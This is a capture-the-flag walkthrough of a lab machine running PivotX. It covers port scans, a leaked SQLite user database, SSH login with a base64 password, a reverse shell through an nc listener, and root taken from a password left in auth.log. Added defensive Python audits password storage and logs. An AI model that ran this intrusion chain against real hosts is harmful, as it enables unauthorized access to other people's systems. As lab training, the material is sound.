Base

Target description

QQ group: 660930334

I. Host discovery

┌──(root㉿kali)-[/miao/maze-sec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-23 14:20 CST
Nmap scan report for 192.168.2.1
Host is up (0.00097s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00057s latency).
MAC Address: 08:00:27:09:B1:6F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.62
Host is up (0.00065s latency).
MAC Address: 08:00:27:8D:84:B2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.03 seconds

Target IP: 192.168.2.62

II. Port scan

1. Full port scan

┌──(root㉿kali)-[/miao/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.62
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-23 14:21 CST
Nmap scan report for 192.168.2.62
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:8D:84:B2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 21.24 seconds

Open ports: 22, 80

2. Detailed service scan

┌──(root㉿kali)-[/miao/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.62
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-23 14:22 CST
Nmap scan report for 192.168.2.62
Host is up (0.00096s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-generator: PivotX
|_http-title: PivotX Powered
| http-robots.txt: 1 disallowed entry
|_/pivotx/
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:8D:84:B2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.05 seconds

Port 80 runs Apache, and a robots.txt is present; it contains the path /pivotx/.

III. Web exploitation

Browsing port 80 shows a content management system built on PivotX.

Visiting the /pivotx/ path from robots.txt reveals the backend login page, which requires a username and password.

1. Directory scan

┌──(root㉿kali)-[/miao/maze-sec/base]
└─# dirsearch -u "http://192.168.2.62"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /miao/maze-sec/base/reports/http_192.168.2.62/_25-07-24_20-37-15.txt

Target: http://192.168.2.62/

[20:37:15] Starting:
[20:37:18] 403 - 277B - /.ht_wsr.txt
[20:37:18] 403 - 277B - /.htaccess.bak1
[20:37:18] 403 - 277B - /.htaccess.sample
[20:37:18] 403 - 277B - /.htaccess.orig
[20:37:18] 403 - 277B - /.htaccess.save
[20:37:18] 403 - 277B - /.htaccess_extra
[20:37:18] 403 - 277B - /.htaccess_orig
[20:37:18] 403 - 277B - /.htaccessBAK
[20:37:18] 403 - 277B - /.htaccess_sc
[20:37:18] 403 - 277B - /.htaccessOLD
[20:37:18] 403 - 277B - /.htaccessOLD2
[20:37:18] 403 - 277B - /.htm
[20:37:18] 403 - 277B - /.html
[20:37:18] 403 - 277B - /.htpasswd_test
[20:37:18] 403 - 277B - /.htpasswds
[20:37:18] 403 - 277B - /.httr-oauth
[20:37:19] 403 - 277B - /.php
[20:37:50] 301 - 313B - /images -> http://192.168.2.62/images/
[20:37:50] 200 - 175B - /images/
[20:37:54] 200 - 5KB - /LICENSE.txt
[20:38:09] 200 - 311B - /README.md
[20:38:11] 200 - 33B - /robots.txt
[20:38:12] 403 - 277B - /server-status
[20:38:12] 403 - 277B - /server-status/
[20:38:22] 200 - 487B - /UPGRADE.txt
[20:38:23] 200 - 12KB - /users.db

Task Completed

Found a users.db.

2. SQLite3

After downloading it, checking the file type shows it is an SQLite 3 database.

┌──(root㉿kali)-[/miao/maze-sec/base]
└─# file users.db
users.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 2, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 2

Querying it yields a username and password: hungry|aHVuZ3J5

┌──(root㉿kali)-[/miao/maze-sec/base]
└─# sqlite3 users.db
SQLite version 3.46.0 2024-05-23 13:25:27
Enter ".help" for usage hints.
sqlite> .table
users
sqlite> select * from users;
1|hungry|aHVuZ3J5

Trying these to log in fails; base64-decoding the password gives hungry, but logging in with that still does not work.

┌──(root㉿kali)-[/miao/maze-sec/base]
└─# echo "aHVuZ3J5" | base64 -d
hungry

IV. Getting access as hungry

Trying SSH, the login finally succeeds with hungry:aHVuZ3J5.

┌──(root㉿kali)-[/miao/maze-sec/base]
└─# ssh hungry@192.168.2.62
hungry@192.168.2.62's password:
Linux Base 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
____
| __ ) __ _ ___ ___
| _ \ / _` / __|/ _ \
| |_) | (_| \__ \ __/
|____/ \__,_|___/\___|

USER FLAG

hungry@Base:~$ cat user.txt 
flag{user-051a0db9a92e4dacc70212da32fd0638}

V. Privilege escalation

1. Getting www-data

Looking in /var/www/html/ there is a creds.txt; it contains two sets of credentials.

hungry@Base:/var/www/html$ cat creds.txt 
guest:guest
admin:YWRtaW*=

Logging in as admin with that password fails, and base64-decoding it fails too.

┌──(root㉿kali)-[/miao/maze-sec/base]
└─# echo "YWRtaW*=" | base64 -d
admibase64: 无效的输入

Base64-encoding admin gives something very similar.

┌──(root㉿kali)-[/miao/maze-sec/base]
└─# echo "admin" | base64
YWRtaW4K

In the end, by guessing, admin:YWRtaW4K= logs in to the backend successfully.

Get a reverse shell.

Shell obtained:
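Both the users.db row (hungry|aHVuZ3J5) and the creds.txt entry store passwords as base64 of the plaintext, which is encoding, not protection. The following Python is an added example, not part of this writeup or of PivotX: it flags such reversible values in a users table (the column names id/username/password are assumed, since the page shows only the values) and shows the salted PBKDF2 form the table should have held instead; the in-memory database is constructed to match the row found on the target.

```python
import base64
import binascii
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ITERATIONS = 200_000  # assumed work factor; tune to the server's hardware

def base64_plaintext(value):
    # Decoded text if value is base64 of printable text, else None. A trailing
    # newline is tolerated: `echo admin | base64` yields YWRtaW4K, i.e. "admin\n".
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    text = text.rstrip("\r\n")
    return text if text and text.isprintable() else None

def hash_password(password, salt=None):
    # Salted PBKDF2-HMAC-SHA256; the 'pbkdf2_sha256$<salt>$<hash>' layout is our own.
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    parts = stored.split("$")
    if len(parts) != 3 or parts[0] != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(parts[1]), PBKDF2_ITERATIONS)
    return hmac.compare_digest(dk.hex(), parts[2])  # constant-time comparison

def audit_users(con):
    # One (username, verdict) per row whose password can be recovered from the table.
    findings = []
    for user, pw in con.execute("SELECT username, password FROM users"):
        if pw.startswith("pbkdf2_sha256$"):
            continue  # hashed with the scheme above; not recoverable
        decoded = base64_plaintext(pw)
        findings.append((user, f"base64 of {decoded!r}" if decoded else "plaintext or unknown"))
    return findings

def build_sample_db():
    # Constructed in-memory copy of the row found in users.db (column names are
    # assumed; the page shows only values), plus one row stored the hardened way.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'hungry', 'aHVuZ3J5')")
    con.execute("INSERT INTO users VALUES (2, 'auditor', ?)", (hash_password("correct horse"),))
    return con
```

Running `audit_users(build_sample_db())` reports only the hungry row; the creds.txt value with its trailing newline decodes to admin the same way.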

┌──(root㉿kali)-[/miao/maze-sec/base]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.62] 33690
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),4(adm)

2. Getting root

Checking the id of www-data shows it belongs to the adm group.

The adm group is a special group on Linux systems. Its members typically have permission to read and write system log files, view system performance metrics, and perform other administrative tasks. If the current user belongs to the adm group, the sensitive system logs stored under /var/log/ can be read to assist privilege escalation.

Look at /var/log

www-data@Base:/$ ls -la /var/log
total 2144
drwxr-xr-x 10 root root 4096 Jul 24 08:15 .
drwxr-xr-x 12 root root 4096 Apr 1 10:05 ..
-rw-r--r-- 1 root root 302 Jul 20 00:12 alternatives.log
-rw-r--r-- 1 root root 11791 Apr 11 22:03 alternatives.log.1
-rw-r--r-- 1 root root 1658 Mar 31 04:15 alternatives.log.2.gz
drwxr-x--- 2 root adm 4096 Jul 24 08:15 apache2
drwxr-xr-x 2 root root 4096 Jul 20 00:30 apt
-rw-r----- 1 root adm 9394 Jul 24 09:09 auth.log
-rw-rw---- 1 root utmp 0 Jul 19 23:58 btmp
-rw-rw---- 1 root utmp 2688 Apr 11 21:48 btmp.1
-rw-r----- 1 root adm 53236 Jul 24 09:09 daemon.log
-rw-r----- 1 root adm 970 Jul 20 00:00 daemon.log.1
-rw-r----- 1 root adm 9582 Jul 19 23:58 daemon.log.2.gz
-rw-r----- 1 root adm 50014 Apr 11 21:37 daemon.log.3.gz
-rw-r----- 1 root adm 25197 Jul 24 08:15 debug
-rw-r----- 1 root adm 48236 Jul 19 23:58 debug.1
-rw-r----- 1 root adm 13708 Apr 11 21:37 debug.2.gz
-rw-r--r-- 1 root root 2501 Jul 20 00:30 dpkg.log
-rw-r--r-- 1 root root 148321 Apr 11 22:03 dpkg.log.1
-rw-r--r-- 1 root root 20031 Mar 31 04:52 dpkg.log.2.gz
-rw-r--r-- 1 root root 32064 Jul 20 00:10 faillog
-rw-r--r-- 1 root root 1388 Apr 4 22:04 fontconfig.log
-rw-r----- 1 irc adm 0 Mar 31 04:15 inspircd.log
drwxr-xr-x 3 root root 4096 Mar 18 20:40 installer
drwxr-xr-x 2 irc irc 4096 Mar 31 03:47 ircd
drwxr-sr-x+ 3 root systemd-journal 4096 Mar 18 21:17 journal
-rw-r----- 1 root adm 172491 Jul 24 08:15 kern.log
-rw-r----- 1 root adm 357384 Jul 19 23:58 kern.log.1
-rw-r----- 1 root adm 228576 Apr 11 21:37 kern.log.2.gz
-rw-rw-r-- 1 root utmp 292584 Jul 24 08:46 lastlog
-rw-r----- 1 root adm 147516 Jul 24 08:15 messages
-rw-r----- 1 root adm 294 Jul 20 00:00 messages.1
-rw-r----- 1 root adm 78049 Jul 19 23:58 messages.2.gz
-rw-r----- 1 root adm 198715 Apr 11 21:37 messages.3.gz
drwx------ 2 root root 4096 Mar 18 20:40 private
drwxr-xr-x 3 root root 4096 Mar 18 21:17 runit
-rw-r----- 1 root adm 7919 Jul 24 09:09 syslog
-rw-r----- 1 root adm 59110 Jul 24 08:15 syslog.1
-rw-r----- 1 root adm 39046 Jul 23 02:17 syslog.2.gz
-rw-r----- 1 root adm 565 Jul 20 00:00 syslog.3.gz
-rw-r----- 1 root adm 108099 Jul 19 23:58 syslog.4.gz
-rw-r----- 1 root adm 14763 Apr 11 21:37 syslog.5.gz
-rw-r----- 1 root adm 89768 Apr 5 07:48 syslog.6.gz
-rw-r----- 1 root adm 13851 Apr 4 06:34 syslog.7.gz
drwxr-x--- 2 root adm 4096 Jul 19 23:58 unattended-upgrades
-rw-r----- 1 root adm 0 Jul 19 23:58 user.log
-rw-r----- 1 root adm 1690 Apr 11 22:22 user.log.1
-rw-rw-r-- 1 root utmp 111360 Jul 24 08:46 wtmp

There is an auth.log; read it.

www-data@Base:/$ cat /var/log/auth.log
Jul 19 23:58:13 moban systemd-logind[332]: Watching system buttons on /dev/input/event3 (Power Button)
Jul 19 23:58:13 moban systemd-logind[332]: Watching system buttons on /dev/input/event4 (Sleep Button)
Jul 19 23:58:13 moban systemd-logind[332]: Watching system buttons on /dev/input/event0 (AT Translated Set 2 keyboard)
Jul 19 23:58:13 moban systemd-logind[332]: New seat seat0.
Jul 19 23:58:13 moban sshd[374]: Server listening on 0.0.0.0 port 22.
Jul 19 23:58:13 moban sshd[374]: Server listening on :: port 22.
Jul 19 23:59:05 moban passwd[528]: pam_unix(passwd:chauthtok): password changed for root
Jul 19 23:58:27 moban sudo[381]: root : password changed to 'dG9kZA==
......
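What makes the excerpt above dangerous is not that adm can read auth.log but that a literal password value was written into a log line. The following Python is an added example, not from this writeup: it scans syslog-format lines for messages that carry a password value, distinguishing them from the normal pam_unix "password changed for <user>" audit record. The sample lines are constructed in the same format (the leaked sudo line is copied from the excerpt; the ssh login line is made up) so it runs offline.

```python
import re

# Constructed sample in the same syslog format as the auth.log excerpt: two normal
# records, the leaked line from the excerpt, and one (made-up) sshd login record.
SAMPLE_AUTH_LOG = """\
Jul 19 23:58:13 moban sshd[374]: Server listening on 0.0.0.0 port 22.
Jul 19 23:59:05 moban passwd[528]: pam_unix(passwd:chauthtok): password changed for root
Jul 19 23:58:27 moban sudo[381]: root : password changed to 'dG9kZA==
Jul 20 00:01:02 moban sshd[600]: Accepted password for hungry from 192.168.2.4 port 51000 ssh2
"""

# <Mon DD HH:MM:SS> <host> <program>[<pid>]: <message>
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<proc>[\w.-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
# A secret *value* following "changed to"/"set to". The pam_unix audit record
# "password changed for <user>" names the account, not the password, and must not match.
SECRET_RE = re.compile(r"\b(?:password|secret|token)\s+(?:changed|set)\s+to\s+'?(?P<value>[^'\s]+)", re.I)
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{4,}={0,2}")

def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def scan_auth_log(text):
    # One finding per line whose message carries a literal secret value.
    findings = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # not a syslog-style record; skip rather than guess
        m = SECRET_RE.search(rec["msg"])
        if m is None:
            continue
        value = m.group("value")
        findings.append({
            "ts": rec["ts"], "proc": rec["proc"], "pid": int(rec["pid"]), "value": value,
            # base64 is reversible, so a base64-looking value is as good as plaintext
            "looks_base64": BASE64_RE.fullmatch(value) is not None,
        })
    return findings

if __name__ == "__main__":
    for f in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"{f['ts']} {f['proc']}[{f['pid']}]: secret value {f['value']!r} "
              f"(base64-looking: {f['looks_base64']})")
```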

The log shows that root's password was changed to dG9kZA==; switching user with it succeeds.

www-data@Base:/$ su root
Password:
____
| __ ) __ _ ___ ___
| _ \ / _` / __|/ _ \
| |_) | (_| \__ \ __/
|____/ \__,_|___/\___|

root@Base:/# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

root@Base:/# cat root/root.txt 
flag{root}

[Summary]

1. PivotX vulnerability

PivotX 3.0.0 RC3 - Remote Code Execution (RCE), requires administrator privileges
https://www.exploit-db.com/exploits/52361

2. SQLite3

A short summary of SQLite injection - Xianzhi community (先知社区)

3. adm group privilege escalation

The adm group is a special group on Linux systems. Its members typically have permission to read and write system log files, view system performance metrics, and perform other administrative tasks. If the current user belongs to the adm group, the sensitive system logs stored under /var/log/ can be read to assist privilege escalation.

Check the owning group of each file in the log directory:

ls -al /var/log

Base
http://miao-sec.github.io/Maze-sec/Base/
Author: Miao
Published: July 24, 2025
License: BY-MIAO